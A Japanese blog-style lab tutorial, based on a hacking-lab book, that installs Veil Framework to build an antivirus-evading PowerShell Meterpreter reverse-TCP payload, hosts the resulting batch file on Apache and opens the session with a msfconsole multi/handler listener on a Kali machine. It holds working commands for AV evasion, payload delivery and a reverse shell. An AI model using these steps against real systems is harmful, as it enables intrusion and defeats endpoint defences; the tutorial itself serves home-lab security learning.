はじめに
「ハッキング・ラボのつくりかた」(IPUSIRON著)のP.335-342をもとに記事を作成する。
注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。
Veil Frameworkのインストールと初期設定
アンチウイルスを回避しなければ、Meterpreterセッションを確立することは出来ない。
Veil Framework(veil)は、アンチウイルスを回避するようなペイロードを生成するツールである。
インストール
sudo apt install veil-evasion
sudo veil
aptでのインストールが完了したら、コマンドveil
を管理者権限で実行する。初回起動時は、セットアップが立ち上がる。
その際に、"Are you sure you wish to install Veil-Evasion?"と尋ねられたら、回答"Continue with installation?"に「s」(silent)を入力
同書にも「このインストールはかなり時間がかかります。」と有るとおり、まじで時間がかかります。
時間に余裕があるときに行いましょう。
apt search veil
の実行結果で、"veil-catapult"というVeilFrameworkを利用する別のツールもあるが、現在(2022年時点)ではサポートされていないっぽい。
https://github.com/Veil-Framework/Veil-Catapult
更新
アンチウイルスからの回避の成功率をあげるために、Veilをアップデードしておく。
Veilのプロンプトで次にコマンを実行。
update
update
コマンドは、veilをsudo veil
で立ち上げておかないと、正常に終了しなかった。
ペイロードの設定・作成
Veilには、EvasionとOrdnanceという2つのツールが存在する。アンチウイルスを回避したい場合、Evasionを選択する。ちなみに、Ordnanceは、ペイロードやエクスプロイトに利用できるシェルコードを生成するらしい。
https://github.com/Veil-Framework/Veil-Ordnance
設定
Evasion (1)を使う。
use 1
使用できるペイロードを一覧表示
list
22番目の"22) powershell/meterpreter/rev_tcp.py"を利用する。
use 22
オプション内容の、LHOSTをKaliLinuxのIPアドレスに変更する。
options
コマンドで確認する。
set lhost 192.168.1.100
options
LHOSTは小文字でもOK
作成
設定が終わったら、ペイロードを作成する。
generate
"Please enter the base name for output files(default is payload): "にはファイル名を指定する。ここでは、evilWin10v2と指定した。batファイルが作成される。
設置
exit
コマンドでVeilプロンプトを終了させて、作成したbatファイルを/home/kaliとapache2のディレクトリにコピーする。apacheを再起動させて、batファイルがwindows10でダウンロードできるようにする。
sudo cp /var/lib/veil/output/source/evilWin10v2.bat /home/kali/payloads/
sudo cp /var/lib/veil/output/source/evilWin10v2.bat /var/www/html/share/
sudo systemctl restart apache2
リバースシェルを待ち受ける
msfconsoleを立ち上げ、
use /multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
exploit
と実行する。
リバースシェルの待ち受け状態となる。
Windows10でevilWin10v2.batを実行する。Windows Defender SmartScreenの警告画面が出る。構わず実行すると、セッションが確立する。
終わりに
参考にしたもの
「ハッキング・ラボのつくりかた」(IPUSIRON著)